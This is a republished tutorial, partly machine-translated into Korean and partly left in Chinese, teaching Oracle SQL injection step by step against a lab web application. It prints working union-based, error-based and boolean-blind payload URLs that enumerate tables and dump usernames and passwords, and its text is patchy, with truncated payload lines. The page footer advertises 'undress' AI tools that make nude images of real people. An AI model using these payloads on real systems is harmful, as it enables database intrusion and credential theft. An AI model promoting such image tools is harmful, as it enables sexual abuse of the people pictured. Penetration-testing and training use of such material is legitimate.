찾다
데이터 베이스Oracle오라클 인젝션의 세세한 부분까지 완전히 마스터할 수 있도록 단계별로 가르쳐드립니다.

이 기사는 주입 및 오류 보고의 기본 단계를 포함하여 Oracle 주입에 대한 관련 지식을 제공하는 것이 모든 사람에게 도움이 되기를 바랍니다. ◆ .

• user_tables table오라클 인젝션의 세세한 부분까지 완전히 마스터할 수 있도록 단계별로 가르쳐드립니다.

◆ 이 테이블의 table_name 열에는 현재 데이터베이스의 모든 테이블이 저장됩니다.

• user_tab_columns 테이블

◆ 이 테이블의 column_name에는 테이블의 모든 열이 저장됩니다.

2. Oracle 쿼리는 테이블 이름을 가져와야 합니다

• xxx에서 *를 선택하세요(범용 테이블이 있습니다: 이중 테이블).

3. 단일 행 하위 쿼리가 여러 행을 반환하는 경우 rownum=1을 사용하여 표준화해야 합니다.

• rownum은 의사 시퀀스 번호이며 항상 1부터 시작합니다.

• Oracle 데이터베이스가 데이터 파일이나 버퍼에서 데이터를 읽는 순서입니다.

• 첫 번째 레코드를 얻을 때 rownum 값은 1, 두 번째 레코드는 2 등입니다.

4. 기본 후속 주입에 필요한 일부 내장 함수

1. length() 사용법:

length(char): 문자열의 길이를 반환합니다.

2. COUNT(*) 사용법:

COUNT(*) 함수는 주어진 선택 항목에서 선택된 행 수를 반환합니다.

3. ascii() 사용법:

ascii(char)는 문자를 ASCII 코드로 변환하는 것을 의미합니다.

4. SUBSTR 사용법:

SUBSTR(소스 문자열, 검색 시작 위치, [길이]) 반환 값은 소스 문자열에 지정된 시작 위치와 길이가 있는 문자열입니다.

5. INSTR 사용법:

INSTR(소스 문자열, 찾을 문자열, 어떤 문자에서 시작하는지, 찾을 시퀀스 번호와 일치하는지)는 찾은 위치를 반환하고, 찾을 수 없으면 0을 반환합니다. 기본 검색 순서는 다음과 같습니다. 왼쪽에서 오른쪽으로. 시작 위치가 음수인 경우 오른쪽부터 검색을 시작합니다. 시작 위치가 0이면 반환 값은 0입니다.

다음 글에서 사용시 설명할 기능도 있습니다.

2. 기본 주입 유형별 기본 단계

환경은 win2003을 시스템으로 하는 VMware에서 jsp+Oracle을 사용하는 간단한 웹 페이지입니다. 1.Oracle 조인트 쿼리 주입

1. 주입 지점 찾기

이 단계는 제 실험 환경에서는 매우 명백하지만 실제 환경에서는 여전히 적절한 주입 지점을 찾아야 합니다. 데이터베이스와 상호 작용하는 입력 상자를 찾은 다음 입력 상자의 데이터 유형과 해당 데이터의 닫는 방법을 결정한 다음 몇 가지 판단 문을 추가하여 주입이 있는지 확인합니다.

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' or 1=2 --

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=2 --
수동으로 데이터 조각을 추가한 후, 다양한 페이로드를 구성하여 URL에 주입 취약점이 있다는 사실을 발견했고, 우리가 입력한 페이로드가 그 효과를 달성했습니다.

3. 열 수 결정

또한 Oracle 데이터베이스는 order by를 사용하여 쿼리 데이터 테이블의 열 수를 결정합니다. Order by는 select -list 표현식의 열 수와 같아야 합니다. 실제 환경에서는 테이블의 컬럼 수가 많을 수 있으므로 컬럼 수를 판단할 때는 이분법을 사용하는 것이 가장 좋습니다.

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' order by 3 --

3개씩 주문하면 페이지가 정상인데 4개 주문하면 오류가 발생해서 쿼리 테이블의 컬럼 개수가 3

입니다.

4.Oracle联合查询

  跟之前的学习的MySQL以及SQL server一样,Oracle同样通过union 来实现联合查询注入,并且不用跟SQL server联合查询注入一样添加all,仅只用union就行,但是依旧要跟SQL server联合查询注入一样判断后续各列的数据类型。

  接下里我们首先查看回显位

http://10.1.5.34:8080/SqlInjection/selcet? union select null,null,null from dual --

  因为在Oracle数据库中的select查询语句必须跟上查询列表,所以在union后面的select查询语句我们必须跟上from dual ,dual表是Oracle数据库中自带的虚拟表,可当万能用。

  我们看到三个列全部会回显在页面上

  下面我们还要通过更改null判断各个回显位的数据类型

http://10.1.5.34:8080/SqlInjection/selcet? union select '1',null,null from dual --

 判断出1号位的数据类型位字符型,接下来我们就可以通过构造不同的payload替换'1',来查询到我们想要的数据

select user from dual 获取用户名

http://10.1.5.34:8080/SqlInjection/selcet? union select user,null,null from dual --

select banner from sys.v_$version where rownum=1 获取版本

http://10.1.5.34:8080/SqlInjection/selcet? union select banner,null,null from sys.v_$version where rownum=1 --

 借助联合查询和默认表 user_tables获取当前数据库所有表名(第一行的)。

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1--

 查看下一行表名

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select table_name,null,null from user_tables where rownum=1 and table_name'T_USER'--

没有其他的表,只有T_USER

如果可以显示多行数据,则可以通过以下代码查看到T-USER所有的列名,不能就只能通过跟上面类似的方法 用“”添加附加条件,去除已经查看到的数据然后查看下一行数据

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' union select column_name,null,null from user_tab_columns where table_name='T_USER'--

获取T_USER表中字段为SNAME、SUSER、SPWD,然后获得他们的值

因为之前判断过1,2,3号位都回显,且都为字符型,所以下面一次性查询,如果只有一个也可以一个一个的查询

10.1.5.34:8080/SqlInjection/selcet?sname=1' union select SNAME,SUSER,SPWD from T_USER--

获取数据

  因为靶场比较简陋,所以实验过程只是体现自己的注入思路,并不代表T_USER表中的东西就是后台账号之内的敏感数据,真实环境中,你查询的数据可以是任何你能查询到数据。

2.Oracle报错注入

1.寻找注入点

   当你发现你找到的注入点在输入错误数据会反弹数据库原始报错信息时,我们就可以使用报错注入。然后前面的步骤基本一致,都是先找注入点,然后分析闭合方式。

2.报错注入

Oracle报错注入——类型转换错误和报错函数。

payload:1=utl_inaddr.get_host_name((SQL语句))

查询结果: ORA-29257: 未知的主机 结果

10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select table_name from user_tables where rownum=1)) --

T_USER即我们想要查询的表名,如果不止一个也可以通过上面联合查询注入中提到的方法,在sql语句中添加附加''条件遍历表名。

跟联合查询用到的相同的语句查到接下来的列名,数据

下面我们可以用到一个函数来改变之前遍历每个数据的麻烦:sys.stragg()在单行中获取所有行信息。

10.1.5.34:8080/SqlInjection/selcet?sname=1' and 1=utl_inaddr.get_host_name((select sys.stragg('~'||SUSER||'~') from T_USER))--

  ||是Oracle中的字符拼接符号,在以上payload使用的时候需要将其更改为%7C%7C,即它的url编码

  我们通过拼接其他符号以及sys,stragg()函数使我们能够清晰的分辨数据表中这个字段每一行的数据,在之前的联合查询注入同样可以使用到这个函数,省去遍历的麻烦

3.Oracle布尔盲注

1.寻找注入点

使用条件:HTTP返回包中没有执行结果的数据和报错信息。

当你发出你构造的payload时,页面并没有产生变化,即说明你的payload正确。

跟上面两种注入一样寻找注入点。

Oracle盲注核心——字符串截取函数、ascii转换函数、条件判断语句。

要注意的是在截断函数中长度是包含开始截取位置那一位的。

2.Oracle布尔盲注

步骤跟之前的顺序是一致的 拿表名-列名-数据,这里就不一一列举了,主要说重点。

我们在拿一个数据时,比如说表名,我们需要先判断他的长度

10.1.5.34:8080/SqlInjection/selcet?suser=&sname=1' and (select length(table_name) from user_tables where rownum=1)=6--

 我们可以先将=改为>或者

http://10.1.5.34:8080/SqlInjection/selcet?sname=1' and (select ascii(substr(table_name,1,1)) from user_tables where rownum=1)=84--

  然后就用截取函数 先截取表名的第一个字符,然后转译为ascii码,同样可以通过>或者

如果会使用burpsuit的话,可以通过burpsuit暴力破解,设置截取位置以及等于号后面的数字来跑出表名。

所有数据均可使用同样的方法获取

推荐教程:《Oracle教程

위 내용은 오라클 인젝션의 세세한 부분까지 완전히 마스터할 수 있도록 단계별로 가르쳐드립니다.의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
이 기사는 CSDN에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제
오라클 : 회사의 사명과 가치 탐색오라클 : 회사의 사명과 가치 탐색Apr 26, 2025 am 12:06 AM

Oracle의 사명은 "사람들이 데이터의 가치를 볼 수 있도록 돕는 것"이며, 그 핵심 가치에는 다음과 같습니다. 1) 고객 우선, 2) 무결성, 3) 혁신 및 4) 팀워크가 포함됩니다. 이 가치는 시장에서 Oracle의 전략적 의사 결정 및 비즈니스 혁신을 안내합니다.

Oracle의 핵심 기능 : 데이터베이스 솔루션 제공Oracle의 핵심 기능 : 데이터베이스 솔루션 제공Apr 25, 2025 am 12:06 AM

Oracle Database는 데이터 보안 및 고 가용성을 제공하기 위해 SQL 및 객체 관계형 모델을 지원하는 관계형 데이터베이스 관리 시스템입니다. 1. Oracle 데이터베이스의 핵심 기능에는 데이터 저장, 검색, 보안 및 백업 및 복구가 포함됩니다. 2. 작업 원칙에는 다층 저장 구조, MVCC 메커니즘 및 최적화가 포함됩니다. 3. 기본 사용에는 테이블 작성, 데이터 삽입 및 쿼리; 고급 사용에는 저장된 절차 및 트리거가 포함됩니다. 4. 성능 최적화 전략에는 인덱스 사용, 최적화 된 SQL 문 및 메모리 관리가 포함됩니다.

Oracle 소프트웨어 사용 : 데이터베이스 관리 및 그 이상Oracle 소프트웨어 사용 : 데이터베이스 관리 및 그 이상Apr 24, 2025 am 12:18 AM

데이터베이스 관리 외에도 Oracle Software는 Javaee 응용 프로그램, 데이터 그리드 및 고성능 컴퓨팅에도 사용됩니다. 1. OracleWeblogicserver는 Javaee 응용 프로그램을 배포하고 관리하는 데 사용됩니다. 2. OracleCoherence는 고성능 데이터 저장 및 캐싱 서비스를 제공합니다. 3. OracleExadata는 고성능 컴퓨팅에 사용됩니다. 이러한 도구를 통해 Oracle은 Enterprise IT 아키텍처에서보다 다양한 역할을 수행 할 수 있습니다.

비즈니스 세계에서 오라클의 역할비즈니스 세계에서 오라클의 역할Apr 23, 2025 am 12:01 AM

Oracle은 데이터베이스 회사 일뿐 만 아니라 클라우드 컴퓨팅 및 ERP 시스템의 리더이기도합니다. 1. Oracle은 데이터베이스에서 클라우드 서비스 및 ERP 시스템에 이르기까지 포괄적 인 솔루션을 제공합니다. 2. OracleCloud는 AWS와 Azure에 도전하여 IAA, PAAS 및 SAAS 서비스를 제공합니다. 3. E-BusinessSuite 및 FusionApplications와 같은 Oracle의 ERP 시스템은 기업이 운영을 최적화하는 데 도움이됩니다.

Oracle Software in Action : 실제 예제Oracle Software in Action : 실제 예제Apr 22, 2025 am 12:12 AM

현실 세계의 Oracle 소프트웨어 응용 프로그램에는 전자 상거래 플랫폼 및 제조가 포함됩니다. 1) 전자 상거래 플랫폼에서 Oracledatabase는 사용자 정보를 저장하고 쿼리하는 데 사용됩니다. 2) 제조에서 Oraclee-BusinessSuite는 재고 및 생산 계획을 최적화하는 데 사용됩니다.

오라클 소프트웨어 : 응용 프로그램 및 산업오라클 소프트웨어 : 응용 프로그램 및 산업Apr 21, 2025 am 12:01 AM

Oracle Software가 여러 분야에서 빛나는 이유는 강력한 응용 프로그램과 맞춤형 솔루션입니다. 1) Oracle은 데이터베이스 관리에서 ERP, CRM, SCM에 이르기까지 포괄적 인 솔루션을 제공합니다. 2) 솔루션은 금융, 의료, 제조 등과 같은 업계 특성에 따라 사용자 정의 할 수 있습니다.

MySQL과 Oracle 중에서 선택 : 의사 결정 가이드MySQL과 Oracle 중에서 선택 : 의사 결정 가이드Apr 20, 2025 am 12:02 AM

MySQL 또는 Oracle을 선택하는 것은 프로젝트 요구 사항에 따라 다릅니다. 1. MySQL은 오픈 소스, 무료 및 사용 편의성으로 인해 중소형 응용 프로그램 및 인터넷 프로젝트에 적합합니다. 2. Oracle은 강력하고 안정적이며 고급 기능으로 인해 대기업의 핵심 비즈니스 시스템에 적합하지만 높은 비용으로 적합합니다.

오라클의 제품 : 깊은 다이빙오라클의 제품 : 깊은 다이빙Apr 19, 2025 am 12:14 AM

Oracle의 제품 생태계에는 데이터베이스, 미들웨어 및 클라우드 서비스가 포함됩니다. 1. Oracledatabase는 효율적인 데이터 저장 및 관리를 지원하는 핵심 제품입니다. 2. OracleWeblogicserver와 같은 미들웨어는 다른 시스템에 연결됩니다. 3. OracleCloud는 완전한 클라우드 컴퓨팅 솔루션 세트를 제공합니다.

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

Video Face Swap

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

mPDF

mPDF

mPDF는 UTF-8로 인코딩된 HTML에서 PDF 파일을 생성할 수 있는 PHP 라이브러리입니다. 원저자인 Ian Back은 자신의 웹 사이트에서 "즉시" PDF 파일을 출력하고 다양한 언어를 처리하기 위해 mPDF를 작성했습니다. HTML2FPDF와 같은 원본 스크립트보다 유니코드 글꼴을 사용할 때 속도가 느리고 더 큰 파일을 생성하지만 CSS 스타일 등을 지원하고 많은 개선 사항이 있습니다. RTL(아랍어, 히브리어), CJK(중국어, 일본어, 한국어)를 포함한 거의 모든 언어를 지원합니다. 중첩된 블록 수준 요소(예: P, DIV)를 지원합니다.

SecList

SecList

SecLists는 최고의 보안 테스터의 동반자입니다. 보안 평가 시 자주 사용되는 다양한 유형의 목록을 한 곳에 모아 놓은 것입니다. SecLists는 보안 테스터에게 필요할 수 있는 모든 목록을 편리하게 제공하여 보안 테스트를 더욱 효율적이고 생산적으로 만드는 데 도움이 됩니다. 목록 유형에는 사용자 이름, 비밀번호, URL, 퍼징 페이로드, 민감한 데이터 패턴, 웹 셸 등이 포함됩니다. 테스터는 이 저장소를 새로운 테스트 시스템으로 간단히 가져올 수 있으며 필요한 모든 유형의 목록에 액세스할 수 있습니다.

VSCode Windows 64비트 다운로드

VSCode Windows 64비트 다운로드

Microsoft에서 출시한 강력한 무료 IDE 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

WebStorm Mac 버전

WebStorm Mac 버전

유용한 JavaScript 개발 도구